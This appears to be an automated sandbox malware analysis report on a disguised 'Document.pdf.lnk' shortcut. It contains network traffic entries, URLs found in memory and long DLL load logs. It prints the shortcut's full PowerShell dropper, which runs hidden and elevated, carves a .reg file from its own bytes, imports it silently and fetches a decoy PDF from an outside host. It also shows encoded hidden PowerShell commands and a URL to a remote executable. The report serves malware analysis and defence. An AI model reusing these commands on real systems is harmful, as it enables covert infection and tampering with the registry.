Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: default-src 'self'; img-src 'self' https://files.catbox.moe; media-src 'self' https://files.catbox.moe; style-src 'self' 'unsafe-inline'; script-src https://www.google.com https://www.gstatic.com 'self' 'unsafe-inline'; frame-src https://www.google.com;
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in memory: default-src 'self'; img-src 'self' https://files.catbox.moe; media-src 'self' https://files.catbox.moe; style-src 'self' 'unsafe-inline'; script-src https://www.google.com https://www.gstatic.com 'self' 'unsafe-inline'; frame-src https://www.google.com;
Source: Joe Sandbox ViewIP Address: 184.25.164.138 184.25.164.138
Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /p1yr9i.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficHTTP traffic detected: GET /p1yr9i.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /p1yr9i.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficHTTP traffic detected: GET /p1yr9i.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: files.catbox.moe
Source: svchost.exe, 00000007.00000002.3021411348.000002A8ED800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDA18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDA18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDA18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDA4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1832515372.000001F1502B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14F8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://files.catbox.moe
Source: powershell.exe, 00000002.00000002.1832515372.000001F1502DF000.00000004.00000800.00020000.00000000.sdmp, Document.pdf.lnkString found in binary or memory: http://files.catbox.moe/p1yr9i.pdf
Source: powershell.exe, 00000000.00000002.1777532455.00000223A62B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B491F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.2014312932.000001BD00085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/MyPrincessAkira/Jarvas/main/Alej.exe
Source: powershell.exe, 00000000.00000002.1777532455.00000223A48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14A361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD00085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1948558880.00000248BB0BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0
Source: powershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1777532455.00000223A48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14A361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1948558880.00000248BB09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1948558880.00000248BB087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD0004C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD0005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F1502DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p1yr9i.pdf
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F1502DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDAC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDAC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1777532455.00000223A62B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B491F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000007.00000003.1842875761.000002A8EDAC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2

E-Banking Fraud

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB

System Summary

barindex
Source: Initial fileStrings: http://files.catbox.moe/p1yr9i.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg
Source: Document.pdf.lnkLNK file: -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: authz.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: aclui.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: clb.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\regedit.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
